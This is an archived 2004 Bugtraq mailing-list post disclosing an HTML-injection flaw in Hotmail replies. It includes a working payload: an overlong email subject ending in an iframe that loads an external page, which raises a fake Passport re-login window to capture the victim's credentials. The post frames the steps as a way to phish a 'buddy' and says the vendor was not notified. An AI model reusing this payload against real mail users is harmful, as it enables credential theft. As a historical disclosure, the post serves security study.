[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200403181942.i2IJg6aI030031@web122.megawebservers.com>
Date: Thu, 18 Mar 2004 19:42:06 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: HOTMAIL / PASSPORT: phishing expedition
Thursday, March 18, 2004
Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted "buddy".
In order to gain your "little pal's" credentials, simply send
him or her an email with an extra long subject like so:
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="http://www.malware.com/pithy.html">
Where our iframe points to window.open along with our trojanised
passport re-sign in page. When your "chum" replies to your
email, our iframe is rendered out of sight in the message body
of the email and up goes our error window requesting him to
login again. Only this time he'll be sending you his credentials.
Notes:
1. this is too pathetic for words. Cursory checking of all
settings in hotmail 'reply to' suggests there is no de-
activation of html email when composing a reply.
2. consideration was given to informing the owner of this
particular web based mail service of this particular issue
however we have not used such a poor service in recent years. So
much so one can only suspect that such a slovenly operation is
intentional in order to force account users to upgrade to the
pay service:
a) as of three hours from time of writing we are still awaiting
receipt of emails into the hotmail account from eight [that's
numeral 8] different mail servers. Internal mail messages are
instant, but three hours for external is completely unacceptable.
b) constant 'server is busy' errors. What does 40 billion
dollars buy you today. More acreage around your acreage for more
privacy.
b) initiation and re-activation of a dormant account of the free
webmail account from the owner of this particular web based mail
service requires a magnifying glass to see. if you don't have
one, you're liable to select the pay for service as it appears
there are no other choices.
c) use yahoo mail. Instant receipt of emails from any mail
server all the time. Reply to html email subject filters tags.
End Call
--
http://www.malware.com
Powered by blists - more mailing lists